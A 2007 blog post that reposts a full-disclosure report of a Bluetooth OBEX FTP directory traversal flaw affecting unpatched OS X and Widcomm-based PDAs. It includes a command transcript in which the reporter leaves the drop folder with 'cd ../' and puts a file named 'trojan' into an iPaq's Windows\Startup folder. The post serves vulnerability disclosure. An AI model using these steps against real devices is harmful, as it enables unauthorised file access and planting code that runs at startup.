Directory Traversal via OBEX

“With a modified version of btftp from Affix-3.2.0 I am now able to confirm that an attacker also has the ability to both grab and put files outside of the default drop path when using OBEX ftp.
Zero authentication is required on OSX if an unpatched machine is being used.
I can also now state that Widcomm software on PDA’s are also affected.
Some PDA’s require authentication for OBEX ftp … some do not.
Here is an example attack against my HP Ipaq 2215

ftp> open 00:04:3e:65:a1:c8
Service found on channel: 3
ftp> ls
drwdx 0 Business
Command complete.
ftp> cd ../
Command complete.
ftp> ls
drwdx 0 ..
Command complete.
ftp> cd Windows
Command complete.
ftp> cd Startup
Command complete.
ftp> put /etc/hosts trojan
Transfer started…
Transfer complete.
257 bytes sent in 0.5 secs (5140.00 B/s)
ftp> ls trojan
Browsing error: OBEX error: Internal server error (0x50)

If I go to the iPaq and browse the folder in question the file is sitting right where I placed it.”
Found on full disclosure


~ by Balle on July 6, 2007.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: